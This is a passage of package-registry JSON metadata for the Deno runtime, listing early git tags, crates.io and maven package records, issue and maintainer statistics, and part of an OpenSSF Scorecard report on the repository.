deno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T12:39:36.264Z","dependent_packages_count":12,"downloads":243319,"downloads_period":"total","dependent_repos_count":14,"rankings":{"downloads":11.774634423217673,"dependent_repos_count":6.9468838050537745,"dependent_packages_count":3.005956607200245,"stargazers_count":0.0022405114340766853,"forks_count":0.05750646014130159,"docker_downloads_count":6.790478681663616,"average":4.762950081451781},"purl":"pkg:cargo/deno_bench_util","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_bench_util","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_bench_util","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_bench_util/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_bench_util/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_bench_util/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_bench_util/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_bench_util/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_bench_util/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_bench_util/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:19.235Z","updated_at":"2022-11-07T18:29:19.235Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:23.049Z","updated_at":"2023-07-18T22:41:23.049Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":14130659,"name":"org.mvnpm.at.deno:win32-x64","ecosystem":"maven","description":"win32-x64 distribution of Deno","homepage":"https://deno.land","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":"org.mvnpm.at.deno","versions_count":18,"first_release_published_at":"2025-10-20T11:18:27.000Z","latest_release_published_at":"2026-08-30T02:06:29.000Z","latest_release_number":"2.9.6","last_synced_at":"2026-09-07T22:53:49.059Z","created_at":"2026-03-27T05:16:02.663Z","updated_at":"2026-09-07T22:53:49.060Z","registry_url":"https://central.sonatype.com/artifact/org.mvnpm.at.deno/win32-x64/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.mvnpm.at.deno/win32-x64/","metadata":{},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 